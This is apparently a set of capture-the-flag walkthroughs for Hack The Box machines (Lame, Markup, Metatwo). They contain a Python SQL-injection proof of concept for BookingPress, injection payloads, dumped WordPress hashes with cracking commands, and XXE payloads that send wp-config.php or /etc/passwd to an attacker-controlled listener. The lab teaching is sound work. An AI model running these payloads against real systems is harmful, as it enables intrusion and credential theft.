Protocol negotiation failed (SMB2)\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nRead data files from: /usr/bin/../share/nmap\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 69.50 seconds\n
    ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-lame/#enumeration","title":"Enumeration","text":"

    Samba smbd 3.0.20-Debian is vulnerable to CVE-2007-2447, the \"username map script\" command execution flaw.

    smbclient -L \\\\$IP\n

    And enumerate shared resources:

    smbmap -H $IP\n
    [+] IP: 10.129.228.86:445       Name: unknown                                           \n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        tmp                                                     READ, WRITE     oh noes!\n        opt                                                     NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n

    tmp share has READ and WRITE permissions.

    msfconsole\nuse exploit/multi/samba/usermap_script\nset RHOSTS $IP\nset LHOST tun0\nrun\n
    ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-markup/","title":"Markup - A HTB machine","text":"
    nmap -sC -A 10.129.95.192 -Pn \n

    Open ports: 22, 80 and 443.

    In the browser there is a login panel. Try typical credentials: the pair admin:password works.

    Locate the form to order an item and capture the request with Burp:

    POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 108\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><order><quantity>2</quantity><item>Home Appliances</item><address>1</address></order>\n

    Playing around with the request (for instance, nesting some XML), you can verify that it is possible to escape the XML tags. This request is vulnerable to XML external entity (XXE) injection.

    From some responses like the one below (and also from the nmap scan), you know the server runs on Windows:

    :  DOMDocument::loadXML(): Opening and ending tag mismatch: order line 1 and item in Entity, line: 1 in <b>C:\\xampp\\htdocs\\process.php\n
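
    Before going after specific files, a quick way to confirm the XXE (a sketch; c:/windows/win.ini is simply a file that exists and is readable on any Windows host):

    <?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>\n<order><quantity>2</quantity><item>&test;</item><address>1</address></order>\n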

    Also, from the source code you know there might be a user called daniel.

    As part of a possible exploitation, we can check whether there is an SSH private key saved in that user's folder.

    POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 182\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>\n<order><quantity>2</quantity><item>\n&test;\n</item><address>1</address></order>\n

    The response will contain the id_rsa private key. More about XXE attacks.

    Now, as port 22 was open:

    ssh -i id_rsa daniel@10.129.95.192\n

    user.txt is on the Desktop.

    ","tags":["walkthrough","windows","xxe"]},{"location":"htb-metatwo/","title":"Walkthrough - Metatwo, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#about-the-machine","title":"About the machine","text":"data Machine Metatwo Platform Hackthebox url link creator Naute OS Linux Release data 29 october 2022 Difficulty Easy Points 20 ip 10.10.11.186","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

    Run:

    export ip=10.10.11.186\n
    ","tags":["walkthrough"]},{"location":"htb-metatwo/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#active-scanning-serviceport-enumeration","title":"Active Scanning: Service/Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS, and traceroute. A general scan first, so as not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

    PORT   STATE SERVICE\n21/tcp open  ftp\n22/tcp open  ssh\n80/tcp open  http\n

    Open 10.10.11.186 in the browser. A redirection to http://metapress.htb occurs, but the hostname does not resolve, so we add the mapping to our /etc/hosts file:

    Open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n

    Move the cursor to the end and add this line:

    10.10.11.186    metapress.htb\n
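
    Equivalently, in one line:

    echo \"10.10.11.186    metapress.htb\" | sudo tee -a /etc/hosts\n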

    Now we can visit the site. The first thing we notice is that it is a WordPress site, which means we can use a tool such as wpscan to enumerate resources on the target. Since we also want to know the installed plugins, we will later perform an aggressive scan with the flag --plugins-detection.

    First, do the generic scan:

    wpscan --url http://metapress.htb\n

    Results:

    _______________________________________________________________\n         __          _______   _____\n         \\ \\        / /  __ \\ / ____|\n          \\ \\  /\\  / /| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\/  \\/ / |  ___/ \\___ \\ / __|/ _` | '_ \\\n            \\  /\\  /  | |     ____) | (__| (_| | | | |\n             \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.22\n       Sponsored by Automattic - https://automattic.com/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http://metapress.htb/ [10.10.11.186]\n[+] Started: Sun Nov 13 14:58:36 2022\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entries:\n |  - Server: nginx/1.18.0\n |  - X-Powered-By: PHP/8.0.24\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] robots.txt found: http://metapress.htb/robots.txt\n | Interesting Entries:\n |  - /wp-admin/\n |  - /wp-admin/admin-ajax.php\n | Found By: Robots Txt (Aggressive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http://codex.wordpress.org/XML-RPC_Pingback_API\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/\n |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/\n\n[+] WordPress readme found: http://metapress.htb/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https://www.iplocation.net/defend-wordpress-from-ddos\n |  - https://github.com/wpscanteam/wpscan/issues/1299\n\n[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).\n | Found By: Rss Generator (Passive Detection)\n |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http://metapress.htb/wp-content/themes/twentytwentyone/\n | Last Updated: 2022-11-02T00:00:00.000Z\n | Readme: http://metapress.htb/wpcontent/themes/twentytwentyone/readme.txt\n | [!] The version is out of date, the latest version is 1.7\n | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1\n | Style Name: Twenty Twenty-One\n | Style URI: https://wordpress.org/themes/twentytwentyone/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. 
Wi...\n | Author: the WordPress team\n | Author URI: https://wordpress.org/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:11 <========================================================> (137 / 137) 100.00% Time: 00:00:11\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n

    Two interesting facts that may come into use later are:

    • WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
    • X-Powered-By: PHP/8.0.24

    So, we have a WordPress version 5.6.2 that is using a PHP version 8.0.24.

    After this, use the aggressive method to scan plugins:

    wpscan --url http://metapress.htb --enumerate vp --plugins-detection aggressive\n

    Since this method is really slow, we have some spare time to have a look at the html code with the inspector tool in our browser. This specific line catches our attention:

    <link rel=\"stylesheet\" id=\"bookingpress_fonts_css-css\" href=\"http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/fonts/fonts.css?ver=1.0.10\" media=\"all\">\n

    Sweet. In a very easy way, we've been able to spot an installed plugin and its version: BookingPress 1.0.10. Browsing the site, it's also easy to get to http://metapress.htb/events/. This plugin version is vulnerable, so the next step is exploitation.

    ","tags":["walkthrough"]},{"location":"htb-metatwo/#initial-access","title":"Initial access","text":"

    By searching for \"bookingpress 1.0.10\" in Google, we can learn that there is a critical vulnerability affecting BookingPress versions below 1.0.11.

    Description of CVE-2022-0739: The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

    We are going to exploit the vulnerability in three different ways:

    • Using a python script.
    • Using the curl command.
    • Using a capture in Burp Suite.

    We will mostly leave out of this write-up the tool sqlmap, which automates the attack (apart from a quick check at the end). Let's get our hands dirty with code.

    Python script. There is a git repo that exploits CVE-2022-0739.

    Let's see the python script:

    import requests\nfrom json import loads\nfrom random import randint\nfrom argparse import ArgumentParser\n\np = ArgumentParser()\np.add_argument('-u', '--url', dest='url', help='URL of wordpress server with vulnerable plugin (http://example.domain)', required=True)\np.add_argument('-n', '--nonce', dest='nonce', help='Nonce that you got as unauthenticated user', required=True)\n\ntrigger = \") UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -\"\ngainer = ') UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset {off}-- -'\n\n# Payload: ) AND ... -- - total(9)\ndef gen_payload(nonce, sqli_postfix, category_id=1):\n    return { \n        'action': 'bookingpress_front_get_category_services', # vulnerable action,\n        '_wpnonce': nonce,\n        'category_id': category_id,\n        'total_service': f'{randint(100, 10000)}{sqli_postfix}'\n    }\n\nif __name__ == '__main__':  \n    print('- BookingPress PoC')\n    i = 0\n    args = p.parse_args()\n    url, nonce = args.url, args.nonce\n    pool = requests.session()\n\n\n    # Check if the target is vulnerable\n    v_url = f'{url}/wp-admin/admin-ajax.php'\n    proof_payload = gen_payload(nonce, trigger)\n\n    res = pool.post(v_url, data=proof_payload)\n    try:\n        res = list(loads(res.text)[0].values())\n    except Exception as e:\n        print('-- Got junk... Plugin not vulnerable or nonce is incorrect')\n        exit(-1)\n    cnt = int(res[7])\n\n    # Capture hashes\n    print('-- Got db fingerprint: ', res[0])\n    print('-- Count of users: ', cnt)\n    for i in range(cnt):\n        try:\n            # Generate payload\n            user_payload = gen_payload(nonce, gainer.format(off=i))\n            u_data = list(loads(pool.post(v_url, user_payload).text)[0].values())\n            print(f'|{u_data[0]}|{u_data[1]}|{u_data[2]}|')\n        except: continue \n

    Create a python script called bookingpress.py and give it execution permission:

    sudo nano bookingpress.py\n# Now we paste the code and save changes with CTRL-X and Yes.\nchmod +x bookingpress.py\n

    bookingpress.py requires two arguments: the first is \"url\" and the second is \"nonce\". The wpnonce is generated during the registration of an event in the browser. To obtain it, book a spot in the calendar and capture the request with Burp Suite. Here is the intercepted traffic:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 95\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=akporp33a92q48gn0afe6akrkt\n\naction=bookingpress_front_get_timings&service_id=1&selected_date=2022-11-21&_wpnonce=f26ed88649\n

    Now execute the script:

    python bookingpress.py -u http://metapress.htb -n f26ed88649\n# note: the script expects a full URL including the scheme\n

    And results:

    - BookingPress PoC\n-- Got db fingerprint:  10.5.15-MariaDB-0+deb11u1\n-- Count of users:  2\n|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|\n|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|\n
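
    Those $P$-prefixed values are WordPress phpass hashes; when the time comes to crack them, hashcat mode 400 is the one to use (a sketch, with hashes.txt holding the two hashes):

    hashcat -a 0 -m 400 hashes.txt /usr/share/wordlists/rockyou.txt\n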

    Curl command. Alternatively, we could use the following command:

    curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'\n

    If you use it, remember to change the value of the NONCE parameter. Mine was f26ed88649.

    Capturing the request with Burp

    First, capture a request for an appointment booking with Burp Suite:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1054\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_before_book_appointment&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=1&appointment_data[selected_service_name]=Startupmeeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0'-7502)+UNION+ALL+SELECT+group_concat(user_login),group_concat(user_pass),%40%40version_compile_os,1,2,3,4,5,6+from+wp_users--+-'&appointment_data[selected_date]=2022-11-15&appointment_data[selected_start_time]=10:00&appointment_data[selected_end_time]=10:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=lolo&appointment_data[customer_lastname]=lolo&appointment_data[customer_phone]=7777777777&appointment_data[customer_email]=lolo@lolo.com&appointment_data[appointment_note]=<script>alert(1)</script>&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=US&appointment_data[total_services]=&appointment_data[stime]=1668426666&appointment_data[spam_captcha]=In6ygQvJD9EB&_wpnonce=da775e35c6\n

    As you can see in the captured traffic, since I restarted my machine due to unrelated issues, my wpnonce has shifted from f26ed88649 to da775e35c6. Send this request to the Repeater module (CTRL-R) and play with it. After a while testing it, I could craft this request:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 112\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1;--+-'\n

That request yields this response:

```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 14 Nov 2022 08:20:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.0.24
Access-Control-Allow-Origin: http://metapress.htb
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 553

[{"bookingpress_service_id":"1","bookingpress_category_id":"1","bookingpress_service_name":"Startup meeting","bookingpress_service_price":"$0.00","bookingpress_service_duration_val":"30","bookingpress_service_duration_unit":"m","bookingpress_service_description":"Join us, we will celebrate our startup!","bookingpress_service_position":"0","bookingpress_servicedate_created":"2022-06-23 18:02:38","service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

Cool. Let's now check what happens when we make the condition false, sending total_service=9)+OR+1=2;--+- instead:

```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 14 Nov 2022 08:22:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.0.24
Access-Control-Allow-Origin: http://metapress.htb
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 2

[]
```

So, when the condition is false (1=2), we get a different response from the server. This proves that we are facing a SQL injection vulnerability.

Also, we could run a scan with the tool sqlmap to confirm that this request is vulnerable. Save the request in a file (in my case, I will call it bookrequest):

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9
```

    Now run sqlmap:

```bash
sqlmap -r bookrequest
```

    Extract from the results:

```
[03:30:05] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 436 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) AND (SELECT 2533 FROM (SELECT(SLEEP(5)))kDHj) AND (2027=2027

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717071,0x467874624e5a4862654847417a50625064757853724c584c57504443685668756446725643566d56,0x7171627a71),NULL,NULL-- -
---
[03:30:17] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:30:17] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 123 times
[03:30:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/metapress.htb'
```

This saves us some time. Now we know there are two SQLi vulnerabilities: the first is time-based blind, and the second is a UNION-query-based injection. We also know the query runs on a table with 9 columns, the seventh one being injectable.

We could have also used the Repeater module in Burp Suite and sent a request for 9 columns and for 10 columns (I will only paste the payloads):

```
# payload of 9 columns. In case of an empty response, the table would have 8 columns.

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+9;--+-

# payload of 10 columns. In case of an empty response, the table would have 9 columns.

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+10;--+-
```

Since we get an empty response with 10 columns, we can conclude that the table has 9 columns. A small script automating this check is sketched below.
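The ORDER BY walk is easy to automate. This is a minimal sketch of the loop, assuming the empty result still comes back as a literal `[]` body and that the hard-coded nonce is still valid for your session:

```python
# Sketch: increase ORDER BY until the server returns an empty result;
# the first N that comes back empty means the table has N-1 columns.
import requests

url = "http://metapress.htb/wp-admin/admin-ajax.php"
NONCE = "da775e35c6"  # assumption: replace with your current _wpnonce

for n in range(1, 21):
    data = {
        "action": "bookingpress_front_get_category_services",
        "_wpnonce": NONCE,
        "category_id": "33",
        "total_service": f"9) OR 1=1 order by {n};-- -",
    }
    body = requests.post(url, data=data).text
    if body.strip() == "[]":
        print(f"Empty response at ORDER BY {n} -> table has {n - 1} columns")
        break
```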

    To get which columns are being displayed, use this payload:

```
action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+all+1,2,3,4,5,6,7,8,9;--+-
```

    In the body of the response, we obtain:

    [{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"2\",\"bookingpress_service_name\":\"3\",\"bookingpress_service_price\":\"$4.00\",\"bookingpress_service_duration_val\":\"5\",\"bookingpress_service_duration_unit\":\"6\",\"bookingpress_service_description\":\"7\",\"bookingpress_service_position\":\"8\",\"bookingpress_servicedate_created\":\"9\",\"service_price_without_currency\":4,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

    All of the columns are being displayed, and this makes sense since it is a UNION query.

Now we are ready to perform our attack using Burp Suite. These would be the successive payloads:

```
# 1. Get the names of the databases:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_schema,null,null,null,null,null,null,null,null+FROM+information_schema.tables;--+-

# Body of the response:

[{"bookingpress_service_id":"information_schema","bookingpress_category_id":null,"bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"},{"bookingpress_service_id":"blog","bookingpress_category_id":null,"bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]

# 2. Get the names of all tables from the selected database:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_name,null,null,null,null,null,null,null,null+FROM+information_schema.tables+WHERE+table_schema=blog;--+-

# But since we are having some issues when using "WHERE" we will dump the database.

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+null,null,null,null,null,null,null,null,table_name+FROM+information_Schema.tables;--+-

# This will give us an extended response from where we need to read and select the interesting table. We will use filters in Burp Suite to locate all results related to USERS. And, as a matter of fact, we can locate a specific table (the common one in WordPress, by the way): wp_users. We will use this later.

# 3. Get the names of all columns of a selected table from a selected database. But since we are having problems using WHERE, we will dump all column names:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+column_name,null,null,null,null,null,null,null,null+FROM+information_schema.columns;--+-

# Again, the response is vast. We can use a Burp Suite filter to find these two columns: user_pass and user_login

# 4. Now we can query the two columns we want (user_login and user_pass) from the table wp_users:

action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+user_login,user_pass,null,null,null,null,null,null,null+FROM+wp_users;--+-

# And the body response:

[{"bookingpress_service_id":"admin","bookingpress_category_id":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.","bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"},{"bookingpress_service_id":"manager","bookingpress_category_id":"$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70","bookingpress_service_name":null,"bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

These are the same results as before:

| user_login | user_pass |
|------------|-----------|
| admin | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. |
| manager | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 |

We are going to use John the Ripper and the rockyou.txt dictionary to crack the hashes.

    Let's first create the file book.hash with the hashes we just found.

```bash
nano book.hash
```

We copy and paste the hashes on separate lines:

```
$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
```

Press CTRL-X and confirm to save.

Now run John the Ripper:

```bash
john -w=/usr/share/wordlists/rockyou.txt book.hash
```

John recovers the password for the manager user.
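If john is not at hand, these WordPress `$P$` hashes are phpass hashes, which can also be checked from Python with the passlib library. A minimal dictionary check, assuming passlib is installed (pip install passlib); it will be far slower than john:

```python
# Sketch: try rockyou candidates against the dumped phpass hashes.
from passlib.hash import phpass

hashes = [
    "$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.",
    "$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70",
]

with open("/usr/share/wordlists/rockyou.txt", encoding="latin-1") as wordlist:
    for line in wordlist:
        candidate = line.rstrip("\n")
        for h in hashes:
            if phpass.verify(candidate, h):
                print(f"{h} -> {candidate}")
```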

Log in to http://metapress.htb/wp-admin with manager's credentials. After doing so, we realize that manager is a limited user: it does not have admin rights, but it can upload media.

After a little bit of research (reading documentation from wpscan.com), we can see that there exists a specific vulnerability for:

• a logged-in user who can upload media,
• WordPress version 5.6.2,
• PHP version 8.

Since our user meets those conditions, let's read a little bit more about that vulnerability. Quoting:

    Description: A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above. This particular vulnerability could be triggered when parsing WAVE audio files. Researchers at security firm SonarSource discovered this XML external entity injection (XXE) security flaw in the WordPress Media Library.

    Impact:

• Arbitrary File Disclosure: The contents of any file on the host's file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
    • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

    This is my first XXE attack! And it's also a pending subject for me because I was asked about it in a job interview for a pentester position and I didn't know how to answer. Great! No pain. Let's get our hands dirty =)

    Wpscan provides us with a Proof Of Concept (POC):

1. Create payload.wav:

```
RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
```

2. Create xxe.dtd, the file we're going to serve:

```
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
```

My IP is 10.10.14.33, I will be using port 1234, and "xxe.dtd" as the name of the file on my server, so payload.wav would be built like this (echo -e interprets the escape sequences and -n suppresses the trailing newline):

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.33:1234/xxe.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

And this is my xxe.dtd file if I want to get the /etc/passwd file:

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>" >
```

    Now, in the same folder where we have saved xxe.dtd, run a php server. In my case:

```bash
php -S 10.10.14.33:1234
```

